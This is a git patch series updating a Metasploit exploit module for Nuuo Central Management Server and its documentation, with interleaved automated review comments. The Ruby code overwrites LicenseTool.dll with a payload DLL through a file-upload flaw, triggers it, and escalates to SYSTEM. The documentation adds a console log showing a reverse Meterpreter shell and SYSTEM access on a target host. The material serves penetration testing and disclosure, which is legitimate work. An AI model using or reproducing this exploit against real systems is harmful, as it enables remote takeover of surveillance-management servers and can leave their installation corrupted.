From: Jacob Robles Date: Tue, 19 Feb 2019 05:48:54 -0600 Subject: [PATCH 18/20] Minor updates exploit:nuuo_cms_fu --- modules/exploits/windows/nuuo/nuuo_cms_fu.rb | 48 +++++++++++--------- 1 file changed, 26 insertions(+), 22 deletions(-) diff --git a/modules/exploits/windows/nuuo/nuuo_cms_fu.rb b/modules/exploits/windows/nuuo/nuuo_cms_fu.rb index c9b992198f..cc41127759 100644 --- a/modules/exploits/windows/nuuo/nuuo_cms_fu.rb +++ b/modules/exploits/windows/nuuo/nuuo_cms_fu.rb @@ -24,6 +24,10 @@ class MetasploitModule < Msf::Exploit::Remote This module will either use a provided session number (which can be guessed with an auxiliary module) or attempt to login using a provided username and password - it will also try the default credentials if nothing is provided. + + This module will overwrite the LicenseTool.dll file in the CMS Server installation. If the module + fails to restore LicenseTool.dll then the installation will be corrupted and NCS Server will + not execute successfully. }, 'License' => MSF_LICENSE, 'Author' => 
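Review bot: The added description paragraph warns that the installation is corrupted if the module fails to restore LicenseTool.dll, but it does not say that the automatic restore is attempted only from a Meterpreter session — the `else` branch of `on_new_session` just prints manual instructions. Add a sentence along the lines of: `Automatic restoration is only attempted when the payload yields a Meterpreter session; with any other payload LicenseTool.dll must be restored by hand as described in the module output.` The enclosing `initialize` call continues outside the hunk.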
@@ -44,57 +48,57 @@ class MetasploitModule < Msf::Exploit::Remote [ 'Nuuo Central Management Server <= v2.4.0', {} ], ], 'Privileged' => true, - 'DisclosureDate' => "Oct 11 2018", + 'DisclosureDate' => 'Oct 11 2018', 'DefaultTarget' => 0)) end def on_new_session(client) - if client.type == "meterpreter" - print_warning("Please wait a bit while we clean up") + if client.type == 'meterpreter' + print_warning('Please wait a bit while we clean up') client.sys.process.get_processes().each do |proc| - if proc['name'] == "NCS_Server.exe" + if proc['name'] == 'NCS_Server.exe' client.sys.process.kill(proc['pid']) - sleep 5 + Rex.sleep(5) client.shell_command_token("move /y #{@dll} LicenseTool.dll") - client.sys.process.execute("NCS_Server.exe") - print_good("Successfully restored LicenseTool.dll!") + client.sys.process.execute('NCS_Server.exe') + print_good('Successfully restored LicenseTool.dll!') end end # elevate privs to system (we're already Admin anyway), and we're done! - client.run_cmd("getsystem") - print_good("We should have SYSTEM now, enjoy your shell!") + client.run_cmd('getsystem') + print_good('We should have SYSTEM now, enjoy your shell!') else - print_error("You are not using meterpreter, so we are unable to restore LicenseTool.dll") + print_error('You are not using meterpreter, so we are unable to restore LicenseTool.dll') print_error("To restore it, kill the NCS_Server.exe process and copy \\#{@dll} to \\LicenseTool.dll") - print_error("... otherwise the Nuuo CMS installation will be nuked!") - print_good("Anyway, enjoy your shell!") + print_error('... 
otherwise the Nuuo CMS installation will be nuked!') + print_good('Anyway, enjoy your shell!') end end def exploit nucs_login - if @nucs_session == nil - fail_with(Failure::NoAccess, "Failed to login to Nuuo CMS") + unless @nucs_session + fail_with(Failure::NoAccess, 'Failed to login to Nuuo CMS') end # Download and upload a backup of LicenseTool.dll, so that we can restore it at post # and not nuke the CMS installation. @dll = rand_text_alpha(12) print_status("Backing up LicenseTool.dll to #{@dll}") - dll_data = nucs_download_file("LicenseTool.dll") + dll_data = nucs_download_file('LicenseTool.dll') nucs_upload_file(@dll, dll_data) - print_status("Uploading payload...") - nucs_upload_file("LicenseTool.dll", generate_payload_dll) + print_status('Uploading payload...') + nucs_upload_file('LicenseTool.dll', generate_payload_dll) - print_status("Sleeping 15 seconds...") - sleep 15 + print_status('Sleeping 15 seconds...') + Rex.sleep(15) - print_status("Sending SENDLICFILE request, shell incoming!") + print_status('Sending SENDLICFILE request, shell incoming!') license_data = rand_text_alpha(50..350) - nucs_send_msg(["SENDLICFILE", "FileName: #{rand_text_alpha(3..11)}.lic", - "Content-Length: " + license_data.length.to_s], license_data) + nucs_send_msg(['SENDLICFILE', "FileName: #{rand_text_alpha(3..11)}.lic", + 'Content-Length: ' + license_data.length.to_s], license_data) end end From 4d5bad7c9672a33106e5d8688484c8a7699a2b2b Mon Sep 17 00:00:00 2001 From: Jacob Robles Date: Tue, 19 Feb 2019 12:20:10 -0600 Subject: [PATCH 19/20] Update doc --- .../exploit/windows/nuuo/nuuo_cms_fu.md | 21 +++++++++++++++++-- 1 file changed, 19 insertions(+), 2 deletions(-) diff --git a/documentation/modules/exploit/windows/nuuo/nuuo_cms_fu.md b/documentation/modules/exploit/windows/nuuo/nuuo_cms_fu.md index 9ef8afed95..e5fde4acf2 100644 --- a/documentation/modules/exploit/windows/nuuo/nuuo_cms_fu.md +++ b/documentation/modules/exploit/windows/nuuo/nuuo_cms_fu.md 
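Review bot: A few idiom points remain in the reworked code: `unless @nucs_session ... end` wrapping a single `fail_with` reads better as the modifier `fail_with(Failure::NoAccess, 'Failed to login to Nuuo CMS') unless @nucs_session`; `'Content-Length: ' + license_data.length.to_s` should be interpolated as `"Content-Length: #{license_data.length}"` to match the adjacent `FileName:` header; and in `on_new_session`, `get_processes()` takes no arguments so the parentheses can go, while the block parameter `proc` shadows `Kernel#proc` — `process` avoids that.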
@@ -1,13 +1,18 @@ -# Nuuo CMS Authenticated Arbitrary File Upload +## Description + +Nuuo CMS Authenticated Arbitrary File Upload The COMMITCONFIG verb is used by a CMS client to upload and modify the configuration of the CMS Server. An example is below: +``` COMMITCONFIG NUCM/1.0 User-Session-No: Filename: FileType: Content-Lenght: + +``` The vulnerability is in the "FileName" parameter, which accepts directory traversal (..\\..\\) characters. Therefore, this function can be abused to overwrite any files in the installation drive of CMS Server. @@ -16,7 +21,10 @@ This vulnerability is exploitable in CMS versions up to and including v2.4. This module will either use a provided session number (which can be guessed with an auxiliary module) or attempt to login using a provided username and password - it will also try the default credentials if nothing is provided. -## The following versions were tested: +## Vulnerable Application + +[NUUO Central Management Server (CMS): all versions below 2.5](http://d1.nuuo.com/NUUO/CMS/) + - 1.5.2 OK - 2.1.0 OK - 2.3.2 OK @@ -25,6 +33,15 @@ This module will either use a provided session number (which can be guessed with - 2.9.0 FAIL - 2.10.0 FAIL +## Scenarios + +### Testing on Windows 10 Pro x64 running NCS Server 2.4.0 + +``` +``` + ## References + https://ics-cert.us-cert.gov/advisories/ICSA-18-284-02 + https://raw.githubusercontent.com/pedrib/PoC/master/advisories/nuuo-cms-ownage.txt From be7ecd85fb22086592fbad47e1627737fc006e68 Mon Sep 17 00:00:00 2001 From: Jacob Robles Date: Tue, 19 Feb 2019 12:23:49 -0600 Subject: [PATCH 20/20] Doc update --- .../exploit/windows/nuuo/nuuo_cms_fu.md | 32 ++++++++++++++++++- 1 file changed, 31 insertions(+), 1 deletion(-) diff --git a/documentation/modules/exploit/windows/nuuo/nuuo_cms_fu.md b/documentation/modules/exploit/windows/nuuo/nuuo_cms_fu.md index e5fde4acf2..26c0e18498 100644 --- a/documentation/modules/exploit/windows/nuuo/nuuo_cms_fu.md 
+++ b/documentation/modules/exploit/windows/nuuo/nuuo_cms_fu.md @@ -20,7 +20,6 @@ This vulnerability is exploitable in CMS versions up to and including v2.4. This module will either use a provided session number (which can be guessed with an auxiliary module) or attempt to login using a provided username and password - it will also try the default credentials if nothing is provided. - ## Vulnerable Application [NUUO Central Management Server (CMS): all versions below 2.5](http://d1.nuuo.com/NUUO/CMS/) @@ -38,6 +37,37 @@ This module will either use a provided session number (which can be guessed with ### Testing on Windows 10 Pro x64 running NCS Server 2.4.0 ``` +msf5 exploit(windows/nuuo/nuuo_cms_fu) > set rhosts 172.22.222.200 +rhosts => 172.22.222.200 +msf5 exploit(windows/nuuo/nuuo_cms_fu) > set verbose true +verbose => true +msf5 exploit(windows/nuuo/nuuo_cms_fu) > exploit + +[*] Started reverse TCP handler on 172.22.222.136:4444 +[*] 172.22.222.200:5180 - Backing up LicenseTool.dll to TQzixBdpOiRG +[*] 172.22.222.200:5180 - Uploading payload... +[*] 172.22.222.200:5180 - Sleeping 15 seconds... +[*] 172.22.222.200:5180 - Sending SENDLICFILE request, shell incoming! +[*] Sending stage (179779 bytes) to 172.22.222.200 +[*] Meterpreter session 3 opened (172.22.222.136:4444 -> 172.22.222.200:49674) at 2019-02-19 05:46:51 -0600 + +meterpreter > +[!] 172.22.222.200:5180 - Please wait a bit while we clean up +[+] 172.22.222.200:5180 - Successfully restored LicenseTool.dll! +...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)). +[+] 172.22.222.200:5180 - We should have SYSTEM now, enjoy your shell! + +meterpreter > getuid +Server username: NT AUTHORITY\SYSTEM +meterpreter > sysinfo +Computer : DESKTOP-IPOGIJR +OS : Windows 10 (Build 17763). +Architecture : x64 +System Language : en_US +Domain : WORKGROUP +Logged On Users : 2 +Meterpreter : x86/windows +meterpreter > ``` ## References
